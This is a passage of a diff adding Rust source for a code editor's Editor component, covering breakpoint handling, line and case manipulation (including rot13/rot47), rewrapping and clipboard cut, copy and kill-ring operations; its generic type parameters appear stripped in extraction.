cloned_prompt.clone().into_any_element() + }), + priority: 0, + }]; + + let focus_handle = bp_prompt.focus_handle(cx); + window.focus(&focus_handle); + + let block_ids = self.insert_blocks(blocks, None, cx); + bp_prompt.update(cx, |prompt, _| { + prompt.add_block_ids(block_ids); + }); + } + + pub(crate) fn breakpoint_at_row( + &self, + row: u32, + window: &mut Window, + cx: &mut Context, + ) -> Option<(Anchor, Breakpoint)> { + let snapshot = self.snapshot(window, cx); + let breakpoint_position = snapshot.buffer_snapshot.anchor_before(Point::new(row, 0)); + + self.breakpoint_at_anchor(breakpoint_position, &snapshot, cx) + } + + pub(crate) fn breakpoint_at_anchor( + &self, + breakpoint_position: Anchor, + snapshot: &EditorSnapshot, + cx: &mut Context, + ) -> Option<(Anchor, Breakpoint)> { + let project = self.project.clone()?; + + let buffer_id = breakpoint_position.buffer_id.or_else(|| { + snapshot + .buffer_snapshot + .buffer_id_for_excerpt(breakpoint_position.excerpt_id) + })?; + + let enclosing_excerpt = breakpoint_position.excerpt_id; + let buffer = project.read_with(cx, |project, cx| project.buffer_for_id(buffer_id, cx))?; + let buffer_snapshot = buffer.read(cx).snapshot(); + + let row = buffer_snapshot + .summary_for_anchor::(&breakpoint_position.text_anchor) + .row; + + let line_len = snapshot.buffer_snapshot.line_len(MultiBufferRow(row)); + let anchor_end = snapshot + .buffer_snapshot + .anchor_after(Point::new(row, line_len)); + + let bp = self + .breakpoint_store + .as_ref()? + .read_with(cx, |breakpoint_store, cx| { + breakpoint_store + .breakpoints( + &buffer, + Some(breakpoint_position.text_anchor..anchor_end.text_anchor), + &buffer_snapshot, + cx, + ) + .next() + .and_then(|(anchor, bp)| { + let breakpoint_row = buffer_snapshot + .summary_for_anchor::(anchor) + .row; + + if breakpoint_row == row { + snapshot + .buffer_snapshot + .anchor_in_excerpt(enclosing_excerpt, *anchor) + .map(|anchor| (anchor, bp.clone())) + } else { + None + } + }) + }); + bp + } + + pub fn edit_log_breakpoint( + &mut self, + _: &EditLogBreakpoint, + window: &mut Window, + cx: &mut Context, + ) { + for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { + let breakpoint = breakpoint.unwrap_or_else(|| Breakpoint { + message: None, + state: BreakpointState::Enabled, + condition: None, + hit_condition: None, + }); + + self.add_edit_breakpoint_block( + anchor, + &breakpoint, + BreakpointPromptEditAction::Log, + window, + cx, + ); + } + } + + fn breakpoints_at_cursors( + &self, + window: &mut Window, + cx: &mut Context, + ) -> Vec<(Anchor, Option)> { + let snapshot = self.snapshot(window, cx); + let cursors = self + .selections + .disjoint_anchors() + .into_iter() + .map(|selection| { + let cursor_position: Point = selection.head().to_point(&snapshot.buffer_snapshot); + + let breakpoint_position = self + .breakpoint_at_row(cursor_position.row, window, cx) + .map(|bp| bp.0) + .unwrap_or_else(|| { + snapshot + .display_snapshot + .buffer_snapshot + .anchor_after(Point::new(cursor_position.row, 0)) + }); + + let breakpoint = self + .breakpoint_at_anchor(breakpoint_position, &snapshot, cx) + .map(|(anchor, breakpoint)| (anchor, Some(breakpoint))); + + breakpoint.unwrap_or_else(|| (breakpoint_position, None)) + }) + // There might be multiple cursors on the same line; all of them should have the same anchors though as their breakpoints positions, which makes it possible to sort and dedup the list. + .collect::>(); + + cursors.into_iter().collect() + } + + pub fn enable_breakpoint( + &mut self, + _: &crate::actions::EnableBreakpoint, + window: &mut Window, + cx: &mut Context, + ) { + for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { + let Some(breakpoint) = breakpoint.filter(|breakpoint| breakpoint.is_disabled()) else { + continue; + }; + self.edit_breakpoint_at_anchor( + anchor, + breakpoint, + BreakpointEditAction::InvertState, + cx, + ); + } + } + + pub fn disable_breakpoint( + &mut self, + _: &crate::actions::DisableBreakpoint, + window: &mut Window, + cx: &mut Context, + ) { + for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { + let Some(breakpoint) = breakpoint.filter(|breakpoint| breakpoint.is_enabled()) else { + continue; + }; + self.edit_breakpoint_at_anchor( + anchor, + breakpoint, + BreakpointEditAction::InvertState, + cx, + ); + } + } + + pub fn toggle_breakpoint( + &mut self, + _: &crate::actions::ToggleBreakpoint, + window: &mut Window, + cx: &mut Context, + ) { + for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { + if let Some(breakpoint) = breakpoint { + self.edit_breakpoint_at_anchor( + anchor, + breakpoint, + BreakpointEditAction::Toggle, + cx, + ); + } else { + self.edit_breakpoint_at_anchor( + anchor, + Breakpoint::new_standard(), + BreakpointEditAction::Toggle, + cx, + ); + } + } + } + + pub fn edit_breakpoint_at_anchor( + &mut self, + breakpoint_position: Anchor, + breakpoint: Breakpoint, + edit_action: BreakpointEditAction, + cx: &mut Context, + ) { + let Some(breakpoint_store) = &self.breakpoint_store else { + return; + }; + + let Some(buffer_id) = breakpoint_position.buffer_id.or_else(|| { + if breakpoint_position == Anchor::min() { + self.buffer() + .read(cx) + .excerpt_buffer_ids() + .into_iter() + .next() + } else { + None + } + }) else { + return; + }; + + let Some(buffer) = self.buffer().read(cx).buffer(buffer_id) else { + return; + }; + + breakpoint_store.update(cx, |breakpoint_store, cx| { + breakpoint_store.toggle_breakpoint( + buffer, + (breakpoint_position.text_anchor, breakpoint), + edit_action, + cx, + ); + }); + + cx.notify(); + } + + #[cfg(any(test, feature = "test-support"))] + pub fn breakpoint_store(&self) -> Option> { + self.breakpoint_store.clone() + } + + pub fn prepare_restore_change( + &self, + revert_changes: &mut HashMap, Rope)>>, + hunk: &MultiBufferDiffHunk, + cx: &mut App, + ) -> Option<()> { + if hunk.is_created_file() { + return None; + } + let buffer = self.buffer.read(cx); + let diff = buffer.diff_for(hunk.buffer_id)?; + let buffer = buffer.buffer(hunk.buffer_id)?; + let buffer = buffer.read(cx); + let original_text = diff + .read(cx) + .base_text() + .as_rope() + .slice(hunk.diff_base_byte_range.clone()); + let buffer_snapshot = buffer.snapshot(); + let buffer_revert_changes = revert_changes.entry(buffer.remote_id()).or_default(); + if let Err(i) = buffer_revert_changes.binary_search_by(|probe| { + probe + .0 + .start + .cmp(&hunk.buffer_range.start, &buffer_snapshot) + .then(probe.0.end.cmp(&hunk.buffer_range.end, &buffer_snapshot)) + }) { + buffer_revert_changes.insert(i, (hunk.buffer_range.clone(), original_text)); + Some(()) + } else { + None + } + } + + pub fn reverse_lines(&mut self, _: &ReverseLines, window: &mut Window, cx: &mut Context) { + self.manipulate_lines(window, cx, |lines| lines.reverse()) + } + + pub fn shuffle_lines(&mut self, _: &ShuffleLines, window: &mut Window, cx: &mut Context) { + self.manipulate_lines(window, cx, |lines| lines.shuffle(&mut thread_rng())) + } + + fn manipulate_lines( + &mut self, + window: &mut Window, + cx: &mut Context, + mut callback: Fn, + ) where + Fn: FnMut(&mut Vec<&str>), + { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = self.buffer.read(cx).snapshot(cx); + + let mut edits = Vec::new(); + + let selections = self.selections.all::(cx); + let mut selections = selections.iter().peekable(); + let mut contiguous_row_selections = Vec::new(); + let mut new_selections = Vec::new(); + let mut added_lines = 0; + let mut removed_lines = 0; + + while let Some(selection) = selections.next() { + let (start_row, end_row) = consume_contiguous_rows( + &mut contiguous_row_selections, + selection, + &display_map, + &mut selections, + ); + + let start_point = Point::new(start_row.0, 0); + let end_point = Point::new( + end_row.previous_row().0, + buffer.line_len(end_row.previous_row()), + ); + let text = buffer + .text_for_range(start_point..end_point) + .collect::(); + + let mut lines = text.split('\n').collect_vec(); + + let lines_before = lines.len(); + callback(&mut lines); + let lines_after = lines.len(); + + edits.push((start_point..end_point, lines.join("\n"))); + + // Selections must change based on added and removed line count + let start_row = + MultiBufferRow(start_point.row + added_lines as u32 - removed_lines as u32); + let end_row = MultiBufferRow(start_row.0 + lines_after.saturating_sub(1) as u32); + new_selections.push(Selection { + id: selection.id, + start: start_row, + end: end_row, + goal: SelectionGoal::None, + reversed: selection.reversed, + }); + + if lines_after > lines_before { + added_lines += lines_after - lines_before; + } else if lines_before > lines_after { + removed_lines += lines_before - lines_after; + } + } + + self.transact(window, cx, |this, window, cx| { + let buffer = this.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + buffer.snapshot(cx) + }); + + // Recalculate offsets on newly edited buffer + let new_selections = new_selections + .iter() + .map(|s| { + let start_point = Point::new(s.start.0, 0); + let end_point = Point::new(s.end.0, buffer.line_len(s.end)); + Selection { + id: s.id, + start: buffer.point_to_offset(start_point), + end: buffer.point_to_offset(end_point), + goal: s.goal, + reversed: s.reversed, + } + }) + .collect(); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections); + }); + + this.request_autoscroll(Autoscroll::fit(), cx); + }); + } + + pub fn toggle_case(&mut self, _: &ToggleCase, window: &mut Window, cx: &mut Context) { + self.manipulate_text(window, cx, |text| { + let has_upper_case_characters = text.chars().any(|c| c.is_uppercase()); + if has_upper_case_characters { + text.to_lowercase() + } else { + text.to_uppercase() + } + }) + } + + pub fn convert_to_upper_case( + &mut self, + _: &ConvertToUpperCase, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| text.to_uppercase()) + } + + pub fn convert_to_lower_case( + &mut self, + _: &ConvertToLowerCase, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| text.to_lowercase()) + } + + pub fn convert_to_title_case( + &mut self, + _: &ConvertToTitleCase, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| { + text.split('\n') + .map(|line| line.to_case(Case::Title)) + .join("\n") + }) + } + + pub fn convert_to_snake_case( + &mut self, + _: &ConvertToSnakeCase, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| text.to_case(Case::Snake)) + } + + pub fn convert_to_kebab_case( + &mut self, + _: &ConvertToKebabCase, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| text.to_case(Case::Kebab)) + } + + pub fn convert_to_upper_camel_case( + &mut self, + _: &ConvertToUpperCamelCase, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| { + text.split('\n') + .map(|line| line.to_case(Case::UpperCamel)) + .join("\n") + }) + } + + pub fn convert_to_lower_camel_case( + &mut self, + _: &ConvertToLowerCamelCase, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| text.to_case(Case::Camel)) + } + + pub fn convert_to_opposite_case( + &mut self, + _: &ConvertToOppositeCase, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| { + text.chars() + .fold(String::with_capacity(text.len()), |mut t, c| { + if c.is_uppercase() { + t.extend(c.to_lowercase()); + } else { + t.extend(c.to_uppercase()); + } + t + }) + }) + } + + pub fn convert_to_rot13( + &mut self, + _: &ConvertToRot13, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| { + text.chars() + .map(|c| match c { + 'A'..='M' | 'a'..='m' => ((c as u8) + 13) as char, + 'N'..='Z' | 'n'..='z' => ((c as u8) - 13) as char, + _ => c, + }) + .collect() + }) + } + + pub fn convert_to_rot47( + &mut self, + _: &ConvertToRot47, + window: &mut Window, + cx: &mut Context, + ) { + self.manipulate_text(window, cx, |text| { + text.chars() + .map(|c| { + let code_point = c as u32; + if code_point >= 33 && code_point <= 126 { + return char::from_u32(33 + ((code_point + 14) % 94)).unwrap(); + } + c + }) + .collect() + }) + } + + fn manipulate_text(&mut self, window: &mut Window, cx: &mut Context, mut callback: Fn) + where + Fn: FnMut(&str) -> String, + { + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = self.buffer.read(cx).snapshot(cx); + + let mut new_selections = Vec::new(); + let mut edits = Vec::new(); + let mut selection_adjustment = 0i32; + + for selection in self.selections.all::(cx) { + let selection_is_empty = selection.is_empty(); + + let (start, end) = if selection_is_empty { + let word_range = movement::surrounding_word( + &display_map, + selection.start.to_display_point(&display_map), + ); + let start = word_range.start.to_offset(&display_map, Bias::Left); + let end = word_range.end.to_offset(&display_map, Bias::Left); + (start, end) + } else { + (selection.start, selection.end) + }; + + let text = buffer.text_for_range(start..end).collect::(); + let old_length = text.len() as i32; + let text = callback(&text); + + new_selections.push(Selection { + start: (start as i32 - selection_adjustment) as usize, + end: ((start + text.len()) as i32 - selection_adjustment) as usize, + goal: SelectionGoal::None, + ..selection + }); + + selection_adjustment += old_length - text.len() as i32; + + edits.push((start..end, text)); + } + + self.transact(window, cx, |this, window, cx| { + this.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + }); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections); + }); + + this.request_autoscroll(Autoscroll::fit(), cx); + }); + } + + pub fn duplicate( + &mut self, + upwards: bool, + whole_lines: bool, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = &display_map.buffer_snapshot; + let selections = self.selections.all::(cx); + + let mut edits = Vec::new(); + let mut selections_iter = selections.iter().peekable(); + while let Some(selection) = selections_iter.next() { + let mut rows = selection.spanned_rows(false, &display_map); + // duplicate line-wise + if whole_lines || selection.start == selection.end { + // Avoid duplicating the same lines twice. + while let Some(next_selection) = selections_iter.peek() { + let next_rows = next_selection.spanned_rows(false, &display_map); + if next_rows.start < rows.end { + rows.end = next_rows.end; + selections_iter.next().unwrap(); + } else { + break; + } + } + + // Copy the text from the selected row region and splice it either at the start + // or end of the region. + let start = Point::new(rows.start.0, 0); + let end = Point::new( + rows.end.previous_row().0, + buffer.line_len(rows.end.previous_row()), + ); + let text = buffer + .text_for_range(start..end) + .chain(Some("\n")) + .collect::(); + let insert_location = if upwards { + Point::new(rows.end.0, 0) + } else { + start + }; + edits.push((insert_location..insert_location, text)); + } else { + // duplicate character-wise + let start = selection.start; + let end = selection.end; + let text = buffer.text_for_range(start..end).collect::(); + edits.push((selection.end..selection.end, text)); + } + } + + self.transact(window, cx, |this, _, cx| { + this.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + }); + + this.request_autoscroll(Autoscroll::fit(), cx); + }); + } + + pub fn duplicate_line_up( + &mut self, + _: &DuplicateLineUp, + window: &mut Window, + cx: &mut Context, + ) { + self.duplicate(true, true, window, cx); + } + + pub fn duplicate_line_down( + &mut self, + _: &DuplicateLineDown, + window: &mut Window, + cx: &mut Context, + ) { + self.duplicate(false, true, window, cx); + } + + pub fn duplicate_selection( + &mut self, + _: &DuplicateSelection, + window: &mut Window, + cx: &mut Context, + ) { + self.duplicate(false, false, window, cx); + } + + pub fn move_line_up(&mut self, _: &MoveLineUp, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = self.buffer.read(cx).snapshot(cx); + + let mut edits = Vec::new(); + let mut unfold_ranges = Vec::new(); + let mut refold_creases = Vec::new(); + + let selections = self.selections.all::(cx); + let mut selections = selections.iter().peekable(); + let mut contiguous_row_selections = Vec::new(); + let mut new_selections = Vec::new(); + + while let Some(selection) = selections.next() { + // Find all the selections that span a contiguous row range + let (start_row, end_row) = consume_contiguous_rows( + &mut contiguous_row_selections, + selection, + &display_map, + &mut selections, + ); + + // Move the text spanned by the row range to be before the line preceding the row range + if start_row.0 > 0 { + let range_to_move = Point::new( + start_row.previous_row().0, + buffer.line_len(start_row.previous_row()), + ) + ..Point::new( + end_row.previous_row().0, + buffer.line_len(end_row.previous_row()), + ); + let insertion_point = display_map + .prev_line_boundary(Point::new(start_row.previous_row().0, 0)) + .0; + + // Don't move lines across excerpts + if buffer + .excerpt_containing(insertion_point..range_to_move.end) + .is_some() + { + let text = buffer + .text_for_range(range_to_move.clone()) + .flat_map(|s| s.chars()) + .skip(1) + .chain(['\n']) + .collect::(); + + edits.push(( + buffer.anchor_after(range_to_move.start) + ..buffer.anchor_before(range_to_move.end), + String::new(), + )); + let insertion_anchor = buffer.anchor_after(insertion_point); + edits.push((insertion_anchor..insertion_anchor, text)); + + let row_delta = range_to_move.start.row - insertion_point.row + 1; + + // Move selections up + new_selections.extend(contiguous_row_selections.drain(..).map( + |mut selection| { + selection.start.row -= row_delta; + selection.end.row -= row_delta; + selection + }, + )); + + // Move folds up + unfold_ranges.push(range_to_move.clone()); + for fold in display_map.folds_in_range( + buffer.anchor_before(range_to_move.start) + ..buffer.anchor_after(range_to_move.end), + ) { + let mut start = fold.range.start.to_point(&buffer); + let mut end = fold.range.end.to_point(&buffer); + start.row -= row_delta; + end.row -= row_delta; + refold_creases.push(Crease::simple(start..end, fold.placeholder.clone())); + } + } + } + + // If we didn't move line(s), preserve the existing selections + new_selections.append(&mut contiguous_row_selections); + } + + self.transact(window, cx, |this, window, cx| { + this.unfold_ranges(&unfold_ranges, true, true, cx); + this.buffer.update(cx, |buffer, cx| { + for (range, text) in edits { + buffer.edit([(range, text)], None, cx); + } + }); + this.fold_creases(refold_creases, true, window, cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections); + }) + }); + } + + pub fn move_line_down( + &mut self, + _: &MoveLineDown, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let buffer = self.buffer.read(cx).snapshot(cx); + + let mut edits = Vec::new(); + let mut unfold_ranges = Vec::new(); + let mut refold_creases = Vec::new(); + + let selections = self.selections.all::(cx); + let mut selections = selections.iter().peekable(); + let mut contiguous_row_selections = Vec::new(); + let mut new_selections = Vec::new(); + + while let Some(selection) = selections.next() { + // Find all the selections that span a contiguous row range + let (start_row, end_row) = consume_contiguous_rows( + &mut contiguous_row_selections, + selection, + &display_map, + &mut selections, + ); + + // Move the text spanned by the row range to be after the last line of the row range + if end_row.0 <= buffer.max_point().row { + let range_to_move = + MultiBufferPoint::new(start_row.0, 0)..MultiBufferPoint::new(end_row.0, 0); + let insertion_point = display_map + .next_line_boundary(MultiBufferPoint::new(end_row.0, 0)) + .0; + + // Don't move lines across excerpt boundaries + if buffer + .excerpt_containing(range_to_move.start..insertion_point) + .is_some() + { + let mut text = String::from("\n"); + text.extend(buffer.text_for_range(range_to_move.clone())); + text.pop(); // Drop trailing newline + edits.push(( + buffer.anchor_after(range_to_move.start) + ..buffer.anchor_before(range_to_move.end), + String::new(), + )); + let insertion_anchor = buffer.anchor_after(insertion_point); + edits.push((insertion_anchor..insertion_anchor, text)); + + let row_delta = insertion_point.row - range_to_move.end.row + 1; + + // Move selections down + new_selections.extend(contiguous_row_selections.drain(..).map( + |mut selection| { + selection.start.row += row_delta; + selection.end.row += row_delta; + selection + }, + )); + + // Move folds down + unfold_ranges.push(range_to_move.clone()); + for fold in display_map.folds_in_range( + buffer.anchor_before(range_to_move.start) + ..buffer.anchor_after(range_to_move.end), + ) { + let mut start = fold.range.start.to_point(&buffer); + let mut end = fold.range.end.to_point(&buffer); + start.row += row_delta; + end.row += row_delta; + refold_creases.push(Crease::simple(start..end, fold.placeholder.clone())); + } + } + } + + // If we didn't move line(s), preserve the existing selections + new_selections.append(&mut contiguous_row_selections); + } + + self.transact(window, cx, |this, window, cx| { + this.unfold_ranges(&unfold_ranges, true, true, cx); + this.buffer.update(cx, |buffer, cx| { + for (range, text) in edits { + buffer.edit([(range, text)], None, cx); + } + }); + this.fold_creases(refold_creases, true, window, cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections) + }); + }); + } + + pub fn transpose(&mut self, _: &Transpose, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let text_layout_details = &self.text_layout_details(window); + self.transact(window, cx, |this, window, cx| { + let edits = this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let mut edits: Vec<(Range, String)> = Default::default(); + s.move_with(|display_map, selection| { + if !selection.is_empty() { + return; + } + + let mut head = selection.head(); + let mut transpose_offset = head.to_offset(display_map, Bias::Right); + if head.column() == display_map.line_len(head.row()) { + transpose_offset = display_map + .buffer_snapshot + .clip_offset(transpose_offset.saturating_sub(1), Bias::Left); + } + + if transpose_offset == 0 { + return; + } + + *head.column_mut() += 1; + head = display_map.clip_point(head, Bias::Right); + let goal = SelectionGoal::HorizontalPosition( + display_map + .x_for_display_point(head, text_layout_details) + .into(), + ); + selection.collapse_to(head, goal); + + let transpose_start = display_map + .buffer_snapshot + .clip_offset(transpose_offset.saturating_sub(1), Bias::Left); + if edits.last().map_or(true, |e| e.0.end <= transpose_start) { + let transpose_end = display_map + .buffer_snapshot + .clip_offset(transpose_offset + 1, Bias::Right); + if let Some(ch) = + display_map.buffer_snapshot.chars_at(transpose_start).next() + { + edits.push((transpose_start..transpose_offset, String::new())); + edits.push((transpose_end..transpose_end, ch.to_string())); + } + } + }); + edits + }); + this.buffer + .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); + let selections = this.selections.all::(cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections); + }); + }); + } + + pub fn rewrap(&mut self, _: &Rewrap, _: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.rewrap_impl(RewrapOptions::default(), cx) + } + + pub fn rewrap_impl(&mut self, options: RewrapOptions, cx: &mut Context) { + let buffer = self.buffer.read(cx).snapshot(cx); + let selections = self.selections.all::(cx); + let mut selections = selections.iter().peekable(); + + let mut edits = Vec::new(); + let mut rewrapped_row_ranges = Vec::>::new(); + + while let Some(selection) = selections.next() { + let mut start_row = selection.start.row; + let mut end_row = selection.end.row; + + // Skip selections that overlap with a range that has already been rewrapped. + let selection_range = start_row..end_row; + if rewrapped_row_ranges + .iter() + .any(|range| range.overlaps(&selection_range)) + { + continue; + } + + let tab_size = buffer.language_settings_at(selection.head(), cx).tab_size; + + // Since not all lines in the selection may be at the same indent + // level, choose the indent size that is the most common between all + // of the lines. + // + // If there is a tie, we use the deepest indent. + let (indent_size, indent_end) = { + let mut indent_size_occurrences = HashMap::default(); + let mut rows_by_indent_size = HashMap::>::default(); + + for row in start_row..=end_row { + let indent = buffer.indent_size_for_line(MultiBufferRow(row)); + rows_by_indent_size.entry(indent).or_default().push(row); + *indent_size_occurrences.entry(indent).or_insert(0) += 1; + } + + let indent_size = indent_size_occurrences + .into_iter() + .max_by_key(|(indent, count)| (*count, indent.len_with_expanded_tabs(tab_size))) + .map(|(indent, _)| indent) + .unwrap_or_default(); + let row = rows_by_indent_size[&indent_size][0]; + let indent_end = Point::new(row, indent_size.len); + + (indent_size, indent_end) + }; + + let mut line_prefix = indent_size.chars().collect::(); + + let mut inside_comment = false; + if let Some(comment_prefix) = + buffer + .language_scope_at(selection.head()) + .and_then(|language| { + language + .line_comment_prefixes() + .iter() + .find(|prefix| buffer.contains_str_at(indent_end, prefix)) + .cloned() + }) + { + line_prefix.push_str(&comment_prefix); + inside_comment = true; + } + + let language_settings = buffer.language_settings_at(selection.head(), cx); + let allow_rewrap_based_on_language = match language_settings.allow_rewrap { + RewrapBehavior::InComments => inside_comment, + RewrapBehavior::InSelections => !selection.is_empty(), + RewrapBehavior::Anywhere => true, + }; + + let should_rewrap = options.override_language_settings + || allow_rewrap_based_on_language + || self.hard_wrap.is_some(); + if !should_rewrap { + continue; + } + + if selection.is_empty() { + 'expand_upwards: while start_row > 0 { + let prev_row = start_row - 1; + if buffer.contains_str_at(Point::new(prev_row, 0), &line_prefix) + && buffer.line_len(MultiBufferRow(prev_row)) as usize > line_prefix.len() + { + start_row = prev_row; + } else { + break 'expand_upwards; + } + } + + 'expand_downwards: while end_row < buffer.max_point().row { + let next_row = end_row + 1; + if buffer.contains_str_at(Point::new(next_row, 0), &line_prefix) + && buffer.line_len(MultiBufferRow(next_row)) as usize > line_prefix.len() + { + end_row = next_row; + } else { + break 'expand_downwards; + } + } + } + + let start = Point::new(start_row, 0); + let start_offset = start.to_offset(&buffer); + let end = Point::new(end_row, buffer.line_len(MultiBufferRow(end_row))); + let selection_text = buffer.text_for_range(start..end).collect::(); + let Some(lines_without_prefixes) = selection_text + .lines() + .map(|line| { + line.strip_prefix(&line_prefix) + .or_else(|| line.trim_start().strip_prefix(&line_prefix.trim_start())) + .with_context(|| { + format!("line did not start with prefix {line_prefix:?}: {line:?}") + }) + }) + .collect::, _>>() + .log_err() + else { + continue; + }; + + let wrap_column = self.hard_wrap.unwrap_or_else(|| { + buffer + .language_settings_at(Point::new(start_row, 0), cx) + .preferred_line_length as usize + }); + let wrapped_text = wrap_with_prefix( + line_prefix, + lines_without_prefixes.join("\n"), + wrap_column, + tab_size, + options.preserve_existing_whitespace, + ); + + // TODO: should always use char-based diff while still supporting cursor behavior that + // matches vim. + let mut diff_options = DiffOptions::default(); + if options.override_language_settings { + diff_options.max_word_diff_len = 0; + diff_options.max_word_diff_line_count = 0; + } else { + diff_options.max_word_diff_len = usize::MAX; + diff_options.max_word_diff_line_count = usize::MAX; + } + + for (old_range, new_text) in + text_diff_with_options(&selection_text, &wrapped_text, diff_options) + { + let edit_start = buffer.anchor_after(start_offset + old_range.start); + let edit_end = buffer.anchor_after(start_offset + old_range.end); + edits.push((edit_start..edit_end, new_text)); + } + + rewrapped_row_ranges.push(start_row..=end_row); + } + + self.buffer + .update(cx, |buffer, cx| buffer.edit(edits, None, cx)); + } + + pub fn cut_common(&mut self, window: &mut Window, cx: &mut Context) -> ClipboardItem { + let mut text = String::new(); + let buffer = self.buffer.read(cx).snapshot(cx); + let mut selections = self.selections.all::(cx); + let mut clipboard_selections = Vec::with_capacity(selections.len()); + { + let max_point = buffer.max_point(); + let mut is_first = true; + for selection in &mut selections { + let is_entire_line = selection.is_empty() || self.selections.line_mode; + if is_entire_line { + selection.start = Point::new(selection.start.row, 0); + if !selection.is_empty() && selection.end.column == 0 { + selection.end = cmp::min(max_point, selection.end); + } else { + selection.end = cmp::min(max_point, Point::new(selection.end.row + 1, 0)); + } + selection.goal = SelectionGoal::None; + } + if is_first { + is_first = false; + } else { + text += "\n"; + } + let mut len = 0; + for chunk in buffer.text_for_range(selection.start..selection.end) { + text.push_str(chunk); + len += chunk.len(); + } + clipboard_selections.push(ClipboardSelection { + len, + is_entire_line, + first_line_indent: buffer + .indent_size_for_line(MultiBufferRow(selection.start.row)) + .len, + }); + } + } + + self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections); + }); + this.insert("", window, cx); + }); + ClipboardItem::new_string_with_json_metadata(text, clipboard_selections) + } + + pub fn cut(&mut self, _: &Cut, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let item = self.cut_common(window, cx); + cx.write_to_clipboard(item); + } + + pub fn kill_ring_cut(&mut self, _: &KillRingCut, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.change_selections(None, window, cx, |s| { + s.move_with(|snapshot, sel| { + if sel.is_empty() { + sel.end = DisplayPoint::new(sel.end.row(), snapshot.line_len(sel.end.row())) + } + }); + }); + let item = self.cut_common(window, cx); + cx.set_global(KillRing(item)) + } + + pub fn kill_ring_yank( + &mut self, + _: &KillRingYank, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + let (text, metadata) = if let Some(KillRing(item)) = cx.try_global() { + if let Some(ClipboardEntry::String(kill_ring)) = item.entries().first() { + (kill_ring.text().to_string(), kill_ring.metadata_json()) + } else { + return; + } + } else { + return; + }; + self.do_paste(&text, metadata, false, window, cx); + } + + pub fn copy_and_trim(&mut self, _: &CopyAndTrim, _: &mut Window, cx: &mut Context) { + self.do_copy(true, cx); + } + + pub fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context) { + self.do_copy(false, cx); + } + + fn do_copy(&self, strip_leading_indents: bool, cx: &mut Context) { + let selections = self.selections.all::(cx); + let buffer = self.buffer.read(cx).read(cx); + let mut text = String::new(); + + let mut clipboard_selections = Vec::with_capacity(selections.len()); + { + let max_point = buffer.max_point(); + let mut is_first = true; + for selection in &selections { + let mut start = selection.start; + let mut end = selection.end; + let is_entire_line = selection.is_empty() || self.selections.line_mode; + if is_entire_line { + start = Point::new(start.row, 0); + end = cmp::min(max_point, Point::new(end.row + 1, 0)); + } + + let mut trimmed_selections = Vec::new(); + if strip_leading_indents && end.row.saturating_sub(start.row) > 0 { + let row = MultiBufferRow(start.row); + let first_indent = buffer.indent_size_for_line(row); + if first_indent.len == 0 || start.column > first_indent.len { + trimmed_selections.push(start..end); + } else { + trimmed_selections.push( + Point::new(row.0, first_indent.len) + ..Point::new(row.0, buffer.line_len(row)), + ); + for row in start.row + 1..=end.row { + let mut line_len = buffer.line_len(MultiBufferRow(row)); + if row == end.row { + line_len = end.column; + } + if line_len == 0 { + trimmed_selections + .push(Point::new(row, 0)..Point::new(row, line_len)); + continue; + } + let row_indent_size = buffer.indent_size_for_line(MultiBufferRow(row)); + if row_indent_size.len >= first_indent.len { + trimmed_selections.push( + Point::new(row, first_indent.len)..Point::new(row, line_len), + ); + } else { + trimmed_selections.clear(); + trimmed_selections.push(start..end); + break; + } + } + } + } else { + trimmed_selections.push(start..end); + } + + for trimmed_range in trimmed_selections { + if is_first { + is_first = false; + } else { + text += "\n"; + } + let mut len = 0; + for chunk in buffer.text_for_range(trimmed_range.start..trimmed_range.end) { + text.push_str(chunk); + len += chunk.len(); + } + 